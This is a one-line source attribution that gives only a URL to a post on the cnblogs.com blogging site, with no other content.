From： https://www.cnblogs.com/trunk/p/17581970.html